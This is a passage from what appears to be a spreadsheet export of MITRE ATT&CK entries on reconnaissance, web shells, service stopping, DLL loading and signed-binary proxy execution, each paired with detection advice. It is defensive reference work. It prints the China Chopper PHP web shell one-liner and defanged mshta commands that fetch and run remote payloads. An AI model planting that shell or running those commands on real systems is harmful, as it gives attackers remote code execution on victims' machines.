    <t>Search Open Technical Databases: DNS/Passive DNS</t>
  </si>
  <si>
    <t>Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),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</si>
  <si>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https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Scan Databases</t>
  </si>
  <si>
    <t>Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/005</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>Search Open Technical Databases: WHOIS</t>
  </si>
  <si>
    <t>Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may search in different online sites depending on what information they seek to gather.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Search Engines</t>
  </si>
  <si>
    <t>Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials.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[Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Social Media</t>
  </si>
  <si>
    <t>Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media)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[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t xml:space="preserve">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
Process monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>Server Software Component: SQL Stored Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) 
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/001</t>
  </si>
  <si>
    <t>12 December 2019</t>
  </si>
  <si>
    <t>On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pereira, @vulcanunsec, CIP</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Server Software Component: Transport Agent</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation</t>
  </si>
  <si>
    <t xml:space="preserve"> Christoffer Strömblad; ESET</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Server Software Component: Web Shell</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>13 December 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) 
&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) </t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>29 March 2019</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;LoadLibrary&lt;/code&gt;, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)
The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via &lt;code&gt;&amp;#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&amp;#x3e;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths. 
Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>20 January 2021</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: CMSTP</t>
  </si>
  <si>
    <t>Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Nik Seetharaman, Palantir; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Compiled HTML File</t>
  </si>
  <si>
    <t>Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Control Panel</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: InstallUtil</t>
  </si>
  <si>
    <t>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Casey Smith; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Mshta</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Msiexec</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
